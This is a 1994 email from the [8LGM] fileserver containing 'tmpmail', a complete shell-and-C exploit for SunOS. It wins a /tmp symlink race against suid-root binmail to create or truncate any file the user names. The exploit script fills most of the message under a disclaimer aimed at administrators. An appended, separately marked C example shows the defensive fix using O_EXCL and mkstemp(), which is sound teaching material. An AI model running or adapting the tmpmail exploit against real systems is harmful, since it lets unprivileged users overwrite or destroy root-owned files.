From Mercury!bagpuss.demon.co.uk!fileserv Sun Dec 25 19:45:02 1994
Return-Path:
Received: by chinet.chinet.com (/\==/\ Smail3.1.28.1 #28.1{chinet}) id ; Sun, 25 Dec 94 19:45 CST
Received: by mercury.mcs.com (/\==/\ Smail3.1.28.1 #28.5) id ; Sun, 25 Dec 94 19:05 CST
Received: from bagpuss.demon.co.uk by post.demon.co.uk id aa15076; 26 Dec 94 1:05 GMT
Received: (root@localhost) by bagpuss.demon.co.uk (99.9/99.9) id BAA03022; Mon, 26 Dec 1994 01:06:09 GMT
Date: Mon, 26 Dec 1994 01:06:09 GMT
From: "[8LGM] Fileserver"
Message-Id: <199412260106.BAA03022@bagpuss.demon.co.uk>
To: Lauren Harper
Reply-To: 8lgm-fileserver@bagpuss.demon.co.uk
Subject: tmpmail
Status: RO

WE RESERVE THE RIGHT TO PUBLISH NAMES OF PEOPLE REQUESTING INFORMATION
FROM OUR SERVER. IF YOU DO NOT AGREE TO THIS, PLEASE DO NOT REQUEST
INFORMATION.

This document is Copyright(C) 1994 by [8LGM] and your usage of the
information contained within this document constitutes your agreement
to render [8LGM] free from any direct or consequential liabilities
or damages which may be incurred as the result of such usage.

[8LGM] makes this information available in good faith, to make it
possible for System Administrators to have the necessary tools to be
able to fix their own systems. However [8LGM] does not endorse the
usage of this information for any purposes.

Permission is hereby granted for usage only in accordance with the
conditions of usage as set forth herein.

tmpmail:

#!/bin/sh
# tmpmail: overwrite files using binmail
#
# Usage: tmpmail to-file
#
# (c) [8lgm] 1994, tested under SunOS 4.1.2.
#
#
# Note: Script only works if mail is suid root.
#       Other vendors may use tmpnam("ma").
#
# This vulnerability can be exploited for sgid
# mail binmails, the only modification would
# be to predict the pid of the mail process
# created by sendmail. This would be 4 forward
# of the current pid - assuming a 'quiet' system.
#
# Will create to-file, or truncate.

PATH=/usr/ucb:/usr/bin:/bin
export PATH
IFS=" "
export IFS

PROG="`basename $0`"

# Check args
if [ $# -ne 1 ]; then
        echo "Syntax: $PROG to-file"
        exit 1
fi

TO_FILE="$1"

# Check we're on SunOS
if [ "x`uname -s`" != "xSunOS" ]; then
        echo "Sorry, this only works on SunOS"
        exit 1
fi

# Create our racing program!
cat > mailrace.c << 'EOF'
#include <stdio.h>
#include <stdlib.h>

char path[] = "/tmp/maaXXXX";

main(argc,argv)
int argc;
char **argv;
{
        int pid;
        char *trv;

        if (argc != 3) {
                fprintf(stderr, "Usage: %s pid tofile\n", argv[0]);
                exit(1);
        }

        pid = atoi(argv[1]);

        /* Stolen from mktemp.c */
        for (trv = path; *trv; ++trv);          /* extra X's get set to 0's */
        while (*--trv == 'X') {
                *trv = (pid % 10) + '0';
                pid /= 10;
        }

        symlink("/tmp/ShortSong", path);
        while(symlink(argv[2], path));
        exit(0);
}
EOF
cc -o mailrace mailrace.c

# Check we now have mailrace
if [ ! -x "mailrace" ]; then
        echo "$PROG: couldnt compile mailrace.c - check it out"
        exit 1
fi

# create some input for binmail
echo localhost $USER > /tmp/BlueRoom.$$
./mailrace $$ $TO_FILE &
exec /bin/mail -d $LOGNAME < /tmp/BlueRoom.$$
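
The script above works because the temporary file name is built from the process id ("/tmp/maaXXXX"), so another user can plant a symlink at that name first. The following is an added example, not part of the [8LGM] message: it contrasts a pid-named open that follows a planted symlink with the two standard fixes, O_EXCL and mkstemp(). It assumes the vulnerable program opens the name without O_EXCL; all function names and the scratch directory are constructed for this illustration.

```c
#define _XOPEN_SOURCE 700
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Weak: a predictable name opened with O_CREAT|O_TRUNC follows a planted symlink. */
static int open_weak(const char *p) { return open(p, O_WRONLY | O_CREAT | O_TRUNC, 0600); }

/* Hardened: O_EXCL fails with EEXIST if anything, even a dangling symlink, is at p. */
static int open_excl(const char *p) { return open(p, O_WRONLY | O_CREAT | O_EXCL, 0600); }

/* Plants a symlink at a pid-derived name inside a private scratch directory
 * (constructed for this example), then tries one opener against it.
 * Returns 1 if the symlink target was created (link followed), 0 if not, -1 on setup error. */
int target_created_via(int (*opener)(const char *)) {
    char dir[] = "/tmp/tmpdemoXXXXXX", tmp[64], target[64];
    struct stat st;
    int fd, hit;
    if (!mkdtemp(dir)) return -1;
    snprintf(tmp, sizeof tmp, "%s/maa%04d", dir, (int)(getpid() % 10000));
    snprintf(target, sizeof target, "%s/victim", dir);
    if (symlink(target, tmp) != 0) { rmdir(dir); return -1; }
    fd = opener(tmp);
    if (fd >= 0) close(fd);
    hit = (stat(target, &st) == 0);
    unlink(target); unlink(tmp); rmdir(dir);
    return hit;
}
int weak_follows_symlink(void) { return target_created_via(open_weak); }
int excl_follows_symlink(void) { return target_created_via(open_excl); }

/* Preferred: mkstemp() picks an unpredictable name and opens it with O_EXCL, mode 0600. */
int mkstemp_is_private(void) {
    char path[] = "/tmp/maXXXXXX";
    struct stat st;
    int fd = mkstemp(path), ok;
    if (fd < 0) return -1;
    ok = fstat(fd, &st) == 0 && S_ISREG(st.st_mode) && (st.st_mode & 077) == 0 && st.st_nlink == 1;
    close(fd); unlink(path);
    return ok;
}

int main(void) {
    printf("weak open followed symlink:   %d\n", weak_follows_symlink());
    printf("O_EXCL open followed symlink: %d\n", excl_follows_symlink());
    printf("mkstemp file is private:      %d\n", mkstemp_is_private());
    return 0;
}
```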